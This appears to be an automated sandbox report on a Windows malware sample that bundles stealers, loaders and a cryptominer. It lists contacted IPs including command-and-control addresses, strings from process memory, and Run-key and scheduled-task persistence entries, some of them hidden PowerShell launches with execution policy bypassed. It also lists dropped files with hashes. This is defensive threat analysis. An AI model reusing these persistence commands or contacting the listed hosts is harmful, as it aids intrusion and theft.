https://drive.google.com/uc?id=	dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	false		high
https://pki.goog/repository/0	b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/settingscrxv	AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-1.corp.google.com/	t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-daily-5.corp.google.com/	t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.shields.io/badge/skeleton-2024-informational	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://drive.google.com/V	AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76	LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883225373.00000178EAE47000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868352131.00000178EAE3C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.eicar.org/download-anti-malware-testfile/Download	b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/t	dwVrTdy.exe, 00000026.00000003.269576528251.00000224326A6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576629725.00000224326A7000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575078876.0000022432692000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreB	dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/s	AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621849034.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620565239.00000247ADED9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620670719.00000247ADEDC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622439350.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/settingsV	AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/	dwVrTdy.exe, 00000026.00000002.269640823894.0000022432619000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635629000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0753000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/U	AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/v	t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/u	t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreI	dwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreG	AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.	b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl4.dig	LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-preprod.corp.google.com/	t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail	LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/pypi/v/importlib_metadata.svg	LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/jaraco/jaraco.functools/issues/5	LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire	b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.rfc-editor.org/info/rfc7253	LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/settings8	dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sandbox.google.com/	t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665172986.000001B3EE8F5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665002237.000001B3EE8EB000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666848962.000001B3EE8FB000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://drive.google.com/x	t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE955000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667320015.000001B3EE954000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
34.117.59.81	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
116.203.12.241	unknown	Germany	24940	HETZNER-ASDE	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
149.154.167.99	unknown	United Kingdom	62041	TELEGRAMRU	false
149.154.167.220	unknown	United Kingdom	62041	TELEGRAMRU	false
172.67.139.78	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.192.146	unknown	United States	13335	CLOUDFLARENETUS	false
64.233.176.101	unknown	United States	15169	GOOGLEUS	false
74.125.136.132	unknown	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
127.1.10.1	unknown	unknown	unknown	unknown	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575244
Start date and time:	2024-12-15 00:18:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 22m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.mine.winEXE@118/196@0/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:20:13	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
00:21:15	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
00:21:23	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
00:21:25	Task Scheduler	Run new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
00:21:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
00:21:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
00:22:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\CDD898AC6E801019693163\CDD898AC6E801019693163.exe
00:22:06	Task Scheduler	Run new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
00:22:11	Task Scheduler	Run new task: defnur path: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
00:22:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\CDD898AC6E801019693163\CDD898AC6E801019693163.exe
00:22:19	Task Scheduler	Run new task: user path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe s>-NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\10009630142\asyno.ps1
00:22:25	Task Scheduler	Run new task: chromes path: "C:\Users\user\AppData\Roaming\chromes.exe"
00:22:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 614fa5846c.exe C:\Users\user\AppData\Local\Temp\1006489001\614fa5846c.exe
00:22:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 3a4323f24d.exe C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exe
00:23:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d83815b520.exe C:\Users\user\AppData\Local\Temp\1006490001\d83815b520.exe
00:23:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a4bd6a9bcb.exe C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exe
00:23:41	Task Scheduler	Run new task: Test Task17 path: C:\ProgramData\lxwdah\qfpwc.exe
00:23:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 432b30086e.exe C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exe
00:24:00	Task Scheduler	Run new task: WORKGROUP path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe s>-NoLogo -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "#yhlesig
00:24:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5102d46fb9.exe C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exe
00:24:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 614fa5846c.exe C:\Users\user\AppData\Local\Temp\1006489001\614fa5846c.exe
00:24:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 3a4323f24d.exe C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exe
00:25:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d83815b520.exe C:\Users\user\AppData\Local\Temp\1006490001\d83815b520.exe
00:25:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a4bd6a9bcb.exe C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exe
00:25:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 432b30086e.exe C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exe
00:26:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5102d46fb9.exe C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exe
00:26:25	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dnsserv.vbs
00:26:45	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lbroker.vbs
00:29:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 55cd1cc254.exe C:\Users\user\AppData\Local\Temp\1015368001\55cd1cc254.exe
00:29:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 43c331c7e9.exe C:\Users\user\AppData\Local\Temp\1015369001\43c331c7e9.exe
18:21:01	API Interceptor	22183653x Sleep call for process: skotes.exe modified
18:21:23	API Interceptor	8x Sleep call for process: b1dc05533c.exe modified
18:21:26	API Interceptor	7x Sleep call for process: powershell.exe modified
18:22:08	API Interceptor	729105x Sleep call for process: graph.exe modified
18:23:06	API Interceptor	400490x Sleep call for process: cmd.exe modified
18:23:06	API Interceptor	472362x Sleep call for process: conhost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
34.117.59.81	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	TRC.mpsl.elf	Get hash	malicious	Mirai	Browse	34.66.152.246
	TRC.sh4.elf	Get hash	malicious	Mirai	Browse	34.65.156.142
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
HETZNER-ASDE	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	116.203.12.241
	TRC.m68k.elf	Get hash	malicious	Mirai	Browse	88.99.60.23
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	116.203.10.31
	g8jiNk0ZVv.exe	Get hash	malicious	Unknown	Browse	195.201.80.82
	https://qr.me-qr.com/nl/sWBHqqwx	Get hash	malicious	Unknown	Browse	78.46.57.143
	order confirmation.exe	Get hash	malicious	FormBook	Browse	88.99.61.52
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	116.203.10.31
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	116.203.10.31
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	116.203.10.31
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	116.203.10.31

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
C:\Program Files\Windows Media Player\graph\graph.exe	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	123394
Entropy (8bit):	7.993523589542907
Encrypted:	true
SSDEEP:	1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
MD5:	53E54AC43786C11E0DDE9DB8F4EB27AB
SHA1:	9C5768D5EE037E90DA77F174EF9401970060520E
SHA-256:	2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
SHA-512:	CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
Malicious:	true
